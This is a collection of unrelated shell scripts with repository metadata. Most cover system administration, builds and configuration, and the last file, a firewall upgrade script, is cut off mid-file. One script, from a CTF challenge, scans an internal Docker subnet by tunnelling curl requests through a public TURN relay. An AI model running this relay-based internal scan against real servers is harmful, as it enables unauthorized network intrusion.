ec0ed5a8aa32d1d1e00b64834ea0135d069e352e
|
Shell
|
vaibhav016/FILRCN
|
/scripts/create_transcripts_from_data.sh
|
UTF-8
| 1,429
| 2.71875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
echo "This will create transcripts for you, Kindly change the datapaths accordingly"
# One pass per LibriSpeech split, in the same order as before. Each split
# lives under Datasets/<split>/LibriSpeech/<split> and gets a
# transcripts.tsv written next to it.
for split in train-clean-100 dev-clean dev-other test-clean \
             train-clean-360 train-other-500 test-other
do
    INPUT_DIR_1="Datasets/$split/LibriSpeech/$split"
    OUTPUT_FILE="Datasets/$split/LibriSpeech/transcripts.tsv"
    python3 create_librispeech_trans.py -d "$INPUT_DIR_1" "$OUTPUT_FILE"
done
| true
|
89ad49821175b9b86088eaafe6e092504a70d319
|
Shell
|
mmalter/widukind-docker
|
/redis-docker/docker-entrypoint.sh
|
UTF-8
| 304
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
# Kernel tuning for Redis: deep accept queue, permissive memory overcommit,
# and transparent huge pages disabled (only when the knob exists).
sysctl -w net.core.somaxconn=65535
sysctl -w vm.overcommit_memory=1
[ -f /sys/kernel/mm/transparent_hugepage/enabled ] && echo never > /sys/kernel/mm/transparent_hugepage/enabled
# When started as `redis-server ...`, give the data dir to the redis user
# and drop privileges before exec-ing the server.
if [ "$1" = 'redis-server' ]; then
chown -R redis .
exec gosu redis "$@"
fi
# Any other command (e.g. a debugging shell) runs as-is.
exec "$@"
| true
|
c177229d96bf647554cfd247a20d20f3b9d2ae55
|
Shell
|
kukrimate/toolchain
|
/src/prepare
|
UTF-8
| 866
| 4.15625
| 4
|
[
"ISC"
] |
permissive
|
#!/bin/bash
# Download and unpack the toolchain sources described by the files in
# ./list (each sourced file sets URL, VER, and optionally PATCHES).
# Shebang changed to bash: the script relies on `source` and on the
# "${PATCHES[@]}" array, which plain /bin/sh need not provide.
# Exit on error
set -e
# download and check a file against an expected SHA256.
# (Not called directly below -- possibly used by sourced list files; verify.)
download_file() {
FILE=`basename $1`
if [ ! -f $FILE ]; then
curl -L $1 > $FILE
else
echo "$FILE already exists"
fi
if [ x"$2" != x`sha256sum $FILE | cut -d ' ' -f 1` ]; then
echo "SHA256 mismatch for $FILE" >&2
exit 1
fi
}
# check if clean is requested
for arg in "$@"; do
case "$arg" in
-c|--clean) do_clean=yes ;;
esac
done
# check if curl is installed. The old `[ ! -x \`command -v curl\` ]` test
# degenerated to a one-argument string test when curl was missing and so
# never failed; testing command -v's exit status is reliable.
if ! command -v curl >/dev/null 2>&1; then
echo "Please install curl" >&2
exit 1
fi
# parse_src LISTFILE: download the source archive named by the sourced
# list file, unpack it once, and apply its PATCHES commands.
parse_src() {
source $1
FILE=`basename $URL`
if [ ! -f $FILE ]; then
curl -L $URL > $FILE
fi
NAME=`basename $1`-$VER
if [ ! -d $NAME ]; then
tar xf $FILE
cd $NAME
for p in "${PATCHES[@]}"; do
eval "$p"
done
cd ..
fi
}
for s in `ls list`; do
if [ x$do_clean = xyes ]; then
rm -rf $s*
else
parse_src list/$s
fi
done
| true
|
23172345c6df02c86783dd587741cbb215785357
|
Shell
|
kuedan/Debian-Live-config
|
/webconverger/config/includes.chroot/etc/init.d/webconverger
|
UTF-8
| 3,167
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
### BEGIN INIT INFO
# Provides: webconverger
# Required-Start: $local_fs $remote_fs
# Required-Stop: $remote_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Webconverger Live environment setup
### END INIT INFO
# Init script that applies kernel-command-line options (homepage, proxy,
# wireless config, chrome/close-icon tweaks) to the live environment.
# PATH should only include /usr/* if it runs after the mountnfs.sh script
PATH=/sbin:/usr/sbin:/bin:/usr/bin
NAME="webconverger"
DESC="Webconverger live environment"
SCRIPTNAME=/etc/init.d/$NAME
WEBCHOME=/home/webc
# Read configuration variable file if it is present
[ -r /etc/default/$NAME ] && . /etc/default/$NAME
. /etc/webc/webc.conf
# Make sure we use a default closeicon
cmdline | grep -qs "closeicon=" || $WEBCHOME/iwcloseconfig.sh strip
# Ensure volume is 100%
amixer -s &>/dev/null <<END
set Master 100% unmute
set Master Front 100% unmute
END
# Lock down X: users must not be able to zap/switch away from the kiosk.
cat >> /etc/X11/xorg.conf <<WCEND
# Webconverger.com options to disable X options to break out of X
Section "ServerFlags"
Option "AllowMouseOpenFail"
Option "HandleSpecialKeys" "Never"
Option "DontZoom" "true"
Option "DontZap" "true"
Option "DontVTSwitch" "true"
EndSection
WCEND
# Walk every kernel command line token and apply the known options.
for x in $(cmdline)
do
case $x in
homepage=*)
set -f -- $(/bin/busybox httpd -d ${x#homepage=})
if test "$1"
then
export HOMEPAGE=$1
else
export HOMEPAGE="http://portal.webconverger.com/"
fi
x=$1
shift
if test -e /etc/iceweasel/profile/prefs.js
then
echo "user_pref(\"browser.startup.homepage\", \"$x\");" >> /etc/iceweasel/profile/prefs.js
fi
;;
closeicon=*) # For controling the close icons in iceweasel
$WEBCHOME/iwcloseconfig.sh ${x#closeicon=}
;;
webcchrome=*) # To configure the chrome settings
$WEBCHOME/iwchromeconfig.sh ${x#webcchrome=}
;;
wpa-*)
# http://anonscm.debian.org/viewvc/pkg-wpa/wpasupplicant/trunk/debian/README.Debian?view=markup
wirelesscfg="${wirelesscfg}$(/bin/busybox httpd -d "${x/=/ }")\n\t"
;;
http_proxy=*)
# http://developer.mozilla.org/en/docs/Mozilla_Networking_Preferences#Proxy
export HTTP_PROXY=${x#http_proxy=}
HOST_PORT=${HTTP_PROXY##*//}
PROXY_HOST=${HOST_PORT%%:*}
PROXY_PORT=${HOST_PORT##*:}
logger PROXY SETTINGS: $HTTP_PROXY $PROXY_HOST $PROXY_PORT
# NOTE(review): only the first echo below is gated by the `test -e &&`;
# the remaining four always append (creating prefs.js if absent). That
# looks unintended -- verify against the homepage= branch above.
test -e /etc/iceweasel/profile/prefs.js &&
echo "user_pref(\"network.proxy.type\", 1);" >> /etc/iceweasel/profile/prefs.js
echo "user_pref(\"network.proxy.http\", \"$PROXY_HOST\");" >> /etc/iceweasel/profile/prefs.js
echo "user_pref(\"network.proxy.http_port\", $PROXY_PORT);" >> /etc/iceweasel/profile/prefs.js
echo "user_pref(\"network.proxy.ssl\", \"$PROXY_HOST\");" >> /etc/iceweasel/profile/prefs.js
echo "user_pref(\"network.proxy.ssl_port\", $PROXY_PORT);" >> /etc/iceweasel/profile/prefs.js
;;
esac
done
# Don't try setup wireless if there is no config or we have a working internet connection
if test -z "$wirelesscfg"
then
exit 0
fi
sed -i "s,wireless config,$wirelesscfg,g" /etc/network/interfaces
for iface in wlan0 eth1 # for want of a better way of detecting wireless interfaces
do
ping -c 1 google.com && break # If the network works, don't touch it
/sbin/ifconfig $iface &> /dev/null || continue # if the device does not exist, skip!
ifup $iface
done
:
| true
|
4d5f52758a665f8f700fbaa38aeaa34bb5c983ba
|
Shell
|
davidandreoletti/dotfiles
|
/install/utils/debug.sh
|
UTF-8
| 309
| 2.953125
| 3
|
[] |
no_license
|
###############################################################################
# Debug helpers: behaviour toggles keyed on the presence of a DEBUG variable
# in the process environment.
###############################################################################
# 0 when DEBUG is exported (any value), non-zero otherwise.
is_debug_on() {
  env | grep -q '^DEBUG='
}
# Inverse of is_debug_on: 0 when DEBUG is absent, 1 when present.
is_debug_off() {
  if is_debug_on; then
    return 1
  fi
  return 0
}
| true
|
e6da0b4a685e0c70f1d868eaec94e8f3e6b5258e
|
Shell
|
dhabyx/slackbuilds
|
/newPackage.sh
|
UTF-8
| 2,803
| 3.78125
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
# Script helper for make slackbuild directory structure
# Copyright 2015 Dhaby Xiloj <slack.dhabyx@gmail.com>
# All rights reserved.
#
# Redistribution and use of this script, with or without modification, is
# permitted provided that the following conditions are met:
#
# 1. Redistributions of this script must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# path to templates dir
CWD=$(pwd)
TMPL_PATH="$CWD/templates"
AUTHOR="Dhaby Xiloj"
YEAR=$(date +%Y)
EMAIL="slack.dhabyx@gmail.com"
COUNTRY=""
ALIAS="DhabyX"
# Print usage and exit.
function displayHelp {
cat << EOF
Usage:
  $0 package_name [template]
Available templates:
  autotools (default)
  cmake
  python
  perl
  rubygem
EOF
exit
}
if [ $# -lt 1 ] || [ $# -gt 2 ]; then
displayHelp
fi
# Pick the template: second argument, or "autotools" when omitted.
TMPL_NAME=""
if [ $# -eq 1 ]; then
if [ "$1" == "-h" ] || [ "$1" == "--help" ]; then
displayHelp
fi
TMPL_NAME="autotools"
else
TMPL_NAME=$2
fi
PKG_NAME=$1
TMPL_FILE="$TMPL_PATH/$TMPL_NAME-template.SlackBuild"
if [ ! -f $TMPL_FILE ]; then
echo "ERROR: template not found."
echo
displayHelp
fi
if [ -d "$CWD/$PKG_NAME" ]; then
echo "ERROR: $PKG_NAME package directory structure already exists."
exit
fi
mkdir $CWD/$PKG_NAME
# copy standard files
cp $TMPL_PATH/{doinst.sh,README} \
$CWD/$PKG_NAME
# edit variables in SlackBuild file
sed "s/\(<appname>\|appname\)/$PKG_NAME/g; \
s/<year>/$YEAR/; s/<you>/$AUTHOR/; \
s/<where you live>/<$EMAIL>/" \
$TMPL_FILE > $CWD/$PKG_NAME/$PKG_NAME.SlackBuild
# edit and clean slack-desc file: keep the header up to (and including) one
# line past the first "appname" occurrence, substituting the package name.
# ($((...)) replaces the deprecated $[...] arithmetic form.)
head -"$(($(awk '/appname/{ print NR; exit }' $TMPL_PATH/slack-desc)+1))" \
$TMPL_PATH/slack-desc | sed "s/appname/$PKG_NAME/g" > $CWD/$PKG_NAME/slack-desc
for i in {1..9}; do
tail -1 $CWD/$PKG_NAME/slack-desc >> $CWD/$PKG_NAME/slack-desc
done
# Fill the .info template in a single sed pass (the blanket first
# substitution empties every quoted value before the specific ones refill it).
sed -e 's/".*"/""/' \
    -e 's/MAINTAINER=""/MAINTAINER="'$ALIAS'"/' \
    -e 's/EMAIL=""/EMAIL="'$EMAIL'"/' \
    -e 's/PRGNAM=""/PRGNAM="'$PKG_NAME'"/' \
    $TMPL_PATH/template.info > $CWD/$PKG_NAME/$PKG_NAME.info
| true
|
059e67bb685d39f0338ebd29238698c7e290356d
|
Shell
|
ssoudan/pyGP
|
/BUILD.sh
|
UTF-8
| 451
| 3.671875
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
# build CMD: docker-build the image for one entry script under
# src/main/python. The image tag drops the first "_" and the ".py" suffix
# from the script name and prefixes "pygp-" (run_bo.py -> pygp-runbo).
function build() {
cmd=$1
c=${cmd/_}
container=${c/.py/}
if [ ! -e "src/main/python/$cmd" ]; then
echo "[E] invalid command: $cmd"
exit 1
fi
docker build --build-arg cmd=${cmd} -t pygp-${container} .
}
#
# main-like: build one image when a script name is given, all of them
# otherwise (default argument "all").
#
cmd=${1:-all}
if [ "all" != "$cmd" ];
then
build $cmd
else
for cmd in run_gpflow.py run_bo.py run_sklearn.py run_tfp.py
do
build $cmd
done
fi
echo "[I] OK"
| true
|
4b42ed932299393a660db6650bd13ddb949405d8
|
Shell
|
erbth/tslegacy
|
/ncurses/install_split.sh
|
UTF-8
| 1,288
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
set -e
# Split the ncurses build into three packages: ncurses (binaries+data),
# ncurses-<ABI> (runtime libraries), ncurses-dev (headers and the rest).
# install_licensing_info DEST PKG: ship the ncurses COPYING file as
# /usr/share/doc/PKG inside the package root DEST.
function install_licensing_info
{
install -dm755 $1/usr/share/doc/$2
cp ${BUILD_DIR}/${SRC_DIR}/COPYING $1/usr/share/doc/$2
}
# Clean the packaging target
declare -a PKG_DIRS
for DIR in ${PACKAGING_LOCATION}/{ncurses,ncurses-${ncurses_ABI},ncurses-dev}/${DESTDIR}
do
PKG_DIRS+=($DIR)
rm -rf ${DIR}/*
done
# Install and adapt the package
rm -rf ${INSTALL_DIR}/target/*
install -dm755 ${INSTALL_DIR}/target
cd ${BUILD_DIR}/${SRC_DIR}
make DESTDIR=${INSTALL_DIR}/target install
cd ${INSTALL_DIR}/target
bash ../adapt.sh
# ncurses: user-facing binaries plus terminfo/tabset data
install -dm755 ${PKG_DIRS[0]}/usr/{lib,share}
mv ${INSTALL_DIR}/target/usr/bin ${PKG_DIRS[0]}/usr/
mv ${INSTALL_DIR}/target/usr/share/{tabset,terminfo} ${PKG_DIRS[0]}/usr/share/
mv ${INSTALL_DIR}/target/usr/lib/terminfo ${PKG_DIRS[0]}/usr/lib/
install_licensing_info ${PKG_DIRS[0]} ncurses
# ncurses-<ABI>: the versioned shared libraries
install -dm755 ${PKG_DIRS[1]}/usr/lib
mv ${INSTALL_DIR}/target/lib ${PKG_DIRS[1]}/
mv ${INSTALL_DIR}/target/usr/lib/{libformw.so.*,libmenuw.so.*,libpanelw.so.*} \
${PKG_DIRS[1]}/usr/lib/
install_licensing_info ${PKG_DIRS[1]} ncurses-${ncurses_ABI}
# ncurses-dev: whatever remains (headers, .so links, docs)
mv ${INSTALL_DIR}/target/usr ${PKG_DIRS[2]}/
mv ${PKG_DIRS[2]}/usr/share/doc/ncurses{,-dev}
install_licensing_info ${PKG_DIRS[2]} ncurses-dev
| true
|
5c140d92a927d98500ca20e8bad25c5cf2d280c7
|
Shell
|
bsrushti/bin_files
|
/find.sh
|
UTF-8
| 130
| 2.984375
| 3
|
[] |
no_license
|
#! /bin/bash
# List (sorted, deduplicated) the files under the current tree whose
# contents match the given keyword.
keyWord=$1
# -r recurse, -l print matching file names only; the quoted pattern and
# the `--` guard keep keywords with spaces or a leading '-' intact.
# This also drops the old `filePaths` scratch file, which was left behind
# and polluted subsequent runs.
grep -rl -- "$keyWord" * | sort -u
| true
|
f20d394578cce61df8c282070340ad13fd984af0
|
Shell
|
ox3e223c/toolkit
|
/screen/hyperpixel4/etc/rc.local
|
UTF-8
| 1,481
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
# Print the IP address
_IP=$(hostname -I) || true
if [ "$_IP" ]; then
printf "My IP address is %s\n" "$_IP"
fi
# Pick the boot config matching the attached display: HyperPixel LCD when
# no HDMI monitor is present, HDMI otherwise. A mismatch swaps
# /boot/config.txt and reboots once.
# Check to see if HDMI display is connected.
_HDMI_EXISTS=$(tvservice -l | grep "HDMI" ) || true
# Is device in LCD mode?
_ISLCD=$(tvservice -s | grep "LCD") || true
if [ -z "$_HDMI_EXISTS" ]; then
if [ "$_ISLCD" ]; then
echo "[ \e[32mOK\e[39m ] NO HDMI connected, Hyperpixel display config already active\n"
#do nothing
else
echo "[\e[91mFAILED\e[39m] NO HDMI connected, switching to Hyperpixel config\n"
#change config to Hyperpixel and reboot since no display detected
sudo cp /boot/hyper-config.txt /boot/config.txt
sudo reboot
fi
else
if [ "$_ISLCD" ]; then
echo "[\e[91mFAILED\e[39m] HDMI is connected, but Hyperpixel config is being used\n"
#we need to switch to HDMI display config and reboot
sudo cp /boot/hdmi-config.txt /boot/config.txt
sudo reboot
else
echo "[ \e[32mOK\e[39m ] HDMI is connected, HDMI config detected, so turning off LCD BL\n"
#we need to shut off the GPIO backlight on the Hyperpixel display since we aren't using it
gpio -g mode 19 out
gpio -g write 19 0
fi
fi
exit 0
| true
|
250385a7dc126992ab7ba5f9fffe11b27d702051
|
Shell
|
sbobovyc/ARMA
|
/server/arma3serverscript
|
UTF-8
| 3,038
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
# ArmA 3 dedicated-server control script. A background "watchdog" process
# relaunches the server whenever it dies; the RUNFILE marks the desire to
# keep running and the PIDFILE tracks the live server process.
#=======================================================================
#======== CONFIGURATION PARAMETERS ========
#======== MUST BE EDITED MANUALLY TO FIT YOUR SYSTEM PARAMETERS ========
#=======================================================================
ARMA_DIR=/media/storage/Arma3
CFG=basic.cfg
CONFIG=server.cfg
PORT=2302
PIDFILE=${ARMA_DIR}/${PORT}.pid
RUNFILE=${ARMA_DIR}/${PORT}.run
LOGFILE=${ARMA_DIR}/log.${PORT}.txt
SERVER=${ARMA_DIR}/arma3server
#OTHERPARAMS=
#OTHERPARAMS=-cpucount=4
#OTHERPARAMS="-cpucount=4 -mod=@cba_a3;@cup_terrains_core;@cup_terrains_maps;@cup_weapons;@rhsafrf;@rhsusaf;@nato_rus_vehicle;@isc"
OTHERPARAMS="-cpucount=4 -mod=@rhsafrf;@rhsgref"
#=======================================================================
# allow core dumps for post-mortem debugging
ulimit -c 1000000
case "$1" in
start)
if [ -f ${RUNFILE} ]; then
$0 stop
fi
echo "Starting ArmA 3 server..."
# file to mark we want server running...
echo "go" >${RUNFILE}
# launch the background watchdog process to run the server
nohup </dev/null >/dev/null $0 watchdog &
;;
stop)
echo "Stopping ArmA 3 server..."
if [ -f ${RUNFILE} ]; then
# ask watcher process to exit by deleting its runfile...
rm -f ${RUNFILE}
fi
# and terminate ArmA 3 server process
if [ -f ${PIDFILE} ]; then
kill -TERM $(< ${PIDFILE})
if [ -f ${PIDFILE} ]; then
rm -f ${PIDFILE}
fi
fi
;;
status)
if [ -f ${RUNFILE} ]; then
echo "Server should be running..."
else
echo "Server should not be running..."
fi
if [ -f ${PIDFILE} ]; then
PID=$(< ${PIDFILE})
echo "PID file exists (PID=${PID})..."
if [ -f /proc/${PID}/cmdline ]; then
echo "Server process seems to be running..."
fi
fi
;;
check)
# Sanity-check the configured paths and files without touching anything.
echo -n "ArmA 3 directory: ${ARMA_DIR} "
if [ -d ${ARMA_DIR} ]; then
echo "OK"
else
echo "MISSING!"
fi
echo -n "Server executable: ${SERVER} "
if [ -x ${SERVER} ]; then
echo "OK"
else
echo "ERROR!"
fi
echo "Port number: ${PORT}"
echo -n "Config file: ${CONFIG} "
if [ -f ${CONFIG} ]; then
echo "OK"
else
echo "MISSING!"
fi
echo -n "Basic config file: ${CFG} "
if [ -f ${CFG} ]; then
echo "OK"
else
echo "MISSING!"
fi
echo "PID file: ${PIDFILE}"
echo "RUN file: ${RUNFILE}"
;;
restart)
$0 stop
$0 start
;;
watchdog)
# this is a background watchdog process. Do not start directly.
# It loops for as long as RUNFILE exists, restarting the server after
# every crash with a short back-off.
while [ -f ${RUNFILE} ]; do
# launch the server...
cd ${ARMA_DIR}
echo >>${LOGFILE} "WATCHDOG ($$): [$(date)] Starting server (port ${PORT})..."
${SERVER} >>${LOGFILE} 2>&1 -server -config=${CONFIG} -cfg=${CFG} -port=${PORT} -pid=${PIDFILE} ${OTHERPARAMS}
if [ -f ${RUNFILE} ]; then
echo >>${LOGFILE} "WATCHDOG ($$): [$(date)] Server died, waiting to restart..."
sleep 5s
else
echo >>${LOGFILE} "WATCHDOG ($$): [$(date)] Server shutdown intentional, watchdog terminating"
fi
done
;;
*)
echo "$0 (start|stop|restart|status|check)"
;;
esac
| true
|
94a4cb66521253defb3999f330f5c8834a5b023b
|
Shell
|
Chadi7781/pinned-git
|
/bin/pin-existing-git
|
UTF-8
| 1,046
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Usage: pin-existing-git */.git
#
# For each given git directory, detect which known host its remote URL
# points at and pin HTTPS certificate verification to that host's bundled
# certificate.
GIT=/usr/bin/git
SELF=$(dirname "$(readlink -f -- "$0")")
SHARE=$(readlink -f -- "$SELF/../share/pinned-git")
# set-pin GIT_DIR CERT_NAME: point the repo at the bundled certificate
# (empty CA path disables the system bundle). The original's dead
# `shift; shift` is gone.
set-pin() {
  local git_dir=$1
  local cert_name=$2
  echo "Pinning $git_dir -> $cert_name"
  "$GIT" "--git-dir=$git_dir" config http.sslcapath "$SHARE/empty-dir"
  "$GIT" "--git-dir=$git_dir" config http.sslcainfo "$SHARE/certs/${cert_name}.crt"
}
# The certificate name equals the host name for every supported host, so a
# table-driven loop replaces the old elif chain. First match wins, in the
# same order as before.
for dir in "$@"; do
  for host in github.com gitlab.com anonscm.debian.org salsa.debian.org git.kernel.org repo.or.cz; do
    if grep -q "url = https://$host/" "$dir/config"; then
      set-pin "$dir" "$host"
      break
    fi
  done
done
| true
|
fcbb98175344debb557bbfda22c92fdb8d3bafe8
|
Shell
|
dune-universe/dune-universe
|
/packages/ocamlformat.0.19.0/tools/build-mingw64.sh
|
UTF-8
| 897
| 3.40625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Script to build `ocamlformat' under Windows, using the `mingw64' toolchain.
# All it requires is a standard Cygwin installation with the `mingw64'
# toolchain.
set -euo pipefail
opam_url=https://github.com/fdopen/opam-repository-mingw/releases/download/0.0.0.2/opam64.tar.xz
opam_archive=$(basename ${opam_url})
build_dir=_build-mingw64
mkdir -p ${build_dir}
cd ${build_dir}
# Each step is skipped when its artifact already exists (resumable build).
[ -f ${opam_archive} ] || curl -O -L ${opam_url}
[ -d opam64 ] || tar xf ${opam_archive}
[ -f bin/opam.exe ] || bash opam64/install.sh --prefix $(pwd)
export PATH=$(pwd)/bin:${PATH}
export OPAMROOT="$(cygpath -aml _opam)"
opam init default "https://github.com/fdopen/opam-repository-mingw.git#opam2" -c "ocaml-variants.4.12.0+mingw64c" --disable-sandboxing --no-setup
eval $(opam env)
cd ..
# relax strict mode for this step -- presumably opam install can return
# non-zero here without being fatal; verify before tightening
set +eu
opam install -y --deps-only ./ocamlformat.opam
set -eu
dune subst
dune build -p ocamlformat
| true
|
e284b9859d50a3b0b95b2841ca745419736a1848
|
Shell
|
vmi/InstallCert
|
/stub.sh
|
UTF-8
| 244
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/sh
# Self-executing JAR stub: this shell header locates its own file (which also
# contains the appended JAR payload) and re-executes it via `java -jar`.
self=`which "$0" 2>/dev/null`
# Fall back to a relative path when $0 is not on PATH but exists as a file.
test $? != 0 -a -f "$0" && self="./$0"
# Under Cygwin, java needs a Windows-style path.
test "$OSTYPE" = cygwin && self="$(cygpath -am "$self")"
java=java
test -n "$JAVA_HOME" && java="$JAVA_HOME/bin/java"
exec "$java" $JAVA_OPTS -jar $self "$@"
# Only reached if exec itself fails.
exit 1
| true
|
6e8a0acfce33adceb42059b40f4cc12316a8c016
|
Shell
|
ulimartinez/dotfiles
|
/polybar/scripts/polybar.sh
|
UTF-8
| 236
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
# Restart polybar on every connected monitor.
killall -q polybar
# Wait until the processes have been shut down
while pgrep -x polybar >/dev/null; do sleep 1; done
# `polybar -m` lists monitors as "NAME: ..."; launch one bar per monitor,
# exposing the monitor name to the config via $MONITOR.
for i in $(polybar -m | awk -F: '{print $1}'); do MONITOR=$i polybar custom -c ~/.polybar/config & done
| true
|
b5e51533dfbd0fb2e122cc7da8371280da6ed2f4
|
Shell
|
legends-ai/legends.ai-ts
|
/scripts/update_geodata.sh
|
UTF-8
| 272
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Download and unpack the MaxMind GeoLite2-Country database into ./geodata/,
# skipping the download when the directory already exists.
ROOT=$(dirname "$0")/..
GEODATA=$ROOT/geodata/
if [ ! -d "$GEODATA" ]; then
  # -f: fail on HTTP errors instead of piping an HTML error page into tar;
  # -sS: quiet but still report errors; -L: follow redirects.
  tar xzvf <(curl -fsSL http://geolite.maxmind.com/download/geoip/database/GeoLite2-Country.tar.gz) -C "$ROOT" && \
    mv GeoLite* "$GEODATA"
else
  echo "Geodata already downloaded."
fi
| true
|
3810d460ce5a179236870ae2ce5ae0a31028c3ac
|
Shell
|
riddick5g/Bash
|
/flog
|
UTF-8
| 594
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#Christopher Rogers
#Lab 3
# Generate ~/public_html/flog.html: an HTML report counting failed SSH login
# attempts per user, parsed from the auth log given as $1.
header='<html>
<body>
<h1> Failed Login Attempts Report as of'
footer='</html>
</body>'
endhead='</h1>'
# BUGFIX: the template variables were expanded unquoted, so the multi-line
# HTML was word-split onto a single line (and exposed to glob expansion).
# Quoting preserves the template exactly as written.
echo "$header" >> ~/public_html/flog.html
date '+%A, %B, %d, %Y' >> ~/public_html/flog.html
echo "$endhead" >> ~/public_html/flog.html
# Extract the message fields, keep "Failed password for" lines, count
# occurrences per user name, and sort by count (desc) then name.
awk '{ print $6 " " $7 " " $8 " " $9 " " $10 " " $11}' "$1" \
| grep "Failed password for" | awk '{print $4}' \
| sort | uniq -c | sort -k1,1rn -k2.1 \
| sed 's/^/<br \/>/g' \
| sed 's/invalid/\<UNKNOWN\>/g' >> ~/public_html/flog.html
echo "$footer" >> ~/public_html/flog.html
chmod 755 ~/public_html/flog.html
exit 0
| true
|
b39c697c3eaa902bdde569602372f2088b78a9ff
|
Shell
|
segfaultsoftware/ordial
|
/pair
|
UTF-8
| 169
| 2.703125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Randomly order the two git-duet authors so neither is always listed first.
#
# BUGFIX: the shebang was #!/bin/sh, but $RANDOM and [[ ]] are bashisms that
# silently break under dash/POSIX sh ($RANDOM expands empty). Use bash.
toggle=$(($RANDOM % 2))
if [[ $toggle -eq 0 ]]; then
GIT_DUET_AUTHORS_FILE=./.pairs git-duet ao ss
else
GIT_DUET_AUTHORS_FILE=./.pairs git-duet ss ao
fi
| true
|
14ddb5401a0e39a465e7aa5e4abebbf306c7c42e
|
Shell
|
kevinpark1217/CSAW-CTF-Quals-2020
|
/webRTC/turner-master/try.sh
|
UTF-8
| 190
| 2.609375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# CTF helper: probe every host in 172.17.0.0/24 through a TURN relay.
# For each candidate IP, start the turner relay in the background, send an
# HTTP request through proxychains, then tear the relay down.
for i in $(seq 2 255); do
./turner -server web.chal.csaw.io:3478 2>&1 | grep channel &
# $! is the PID of the backgrounded pipeline (used to kill it below).
A=$!
sleep 0.25
proxychains curl 172.17.0.$i:5000
# NOTE(review): '&>/dev/null' is bash syntax; under a strict /bin/sh it
# backgrounds `kill` and truncates /dev/null redirection differently.
kill $A &>/dev/null
sleep 0.25
done
| true
|
942e8b7ada665a1a7543095390b2c7b74e201cc1
|
Shell
|
stolati/slant_online
|
/bin/copy-prod-db.bash
|
UTF-8
| 422
| 3.515625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Fetch the production db.json from the EC2 host into the local db/ directory,
# keeping a timestamped copy under db/save/.
set -eux -o pipefail
script_path="$(cd "$(dirname "$0")" ; pwd)"
# Required env variables
EC2_HOST="${EC2_HOST:-slant_aws}"
DB_PATH="$script_path/../db"
TIMESTAMP="$(date +%Y%m%d_%H%M%S)"
destination="$DB_PATH/db.json"
destination_save="$DB_PATH/save/db.prod.$TIMESTAMP.json"
# Copy to current directory
scp $EC2_HOST:~/db/db.json "$destination_save"
# Promote the timestamped snapshot to the working db.json.
cp "$destination_save" "$destination"
exit 0
| true
|
3d1a09f249228367349bbd8bbc73446fd9ab2ce0
|
Shell
|
clearos/app-firewall-custom
|
/deploy/upgrade
|
UTF-8
| 1,249
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/sh
# One-time upgrade of the custom firewall configlet: rewrite hard-coded
# iptables paths to the $IPTABLES constant, then wrap the existing rules in
# an ipv4 guard and append a matching empty ipv6 section.
configlet="/etc/clearos/firewall.d/custom"
# Replace instances of [/usr/sbin/]iptables with $IPTABLES constant
#------------------------------------------------------------------
# Order matters: strip the fully-qualified path first, then bare "iptables".
sed -i -e 's/\/usr\/sbin\/iptables/$IPTABLES/' $configlet
sed -i -e 's/iptables/$IPTABLES/' $configlet
# Modify fw script to handle ipv4/ipv6
#-------------------------------------
if [ -f $configlet ];then
# Guard on FW_PROTO so the rewrite is idempotent across upgrades.
if ! grep -q FW_PROTO $configlet;then
# Successive '1s/^/...\n/' insertions each prepend a line, so the header
# below is listed in reverse of its final order in the file.
sed -i '1s/^/if [ \"\$FW_PROTO\" == \"ipv4\" ]; then true\n/' $configlet
sed -i '1s/^/\n/' $configlet
sed -i '1s/^/#===========================\n/' $configlet
sed -i '1s/^/# IPv4 Custom Firewall Rules\n/' $configlet
sed -i '1s/^/\n/' $configlet
sed -i '1s/^/#######################################\n/' $configlet
sed -i '1s/^/# Created by API - Please Do NOT Edit #\n/' $configlet
sed -i '1s/^/#######################################\n/' $configlet
# Close the ipv4 guard and append an (initially empty) ipv6 section.
sed -i -e "\$afi\n" $configlet
sed -i -e "\$a# IPv6 Custom Firewall Rules" $configlet
sed -i -e "\$a#===========================\n" $configlet
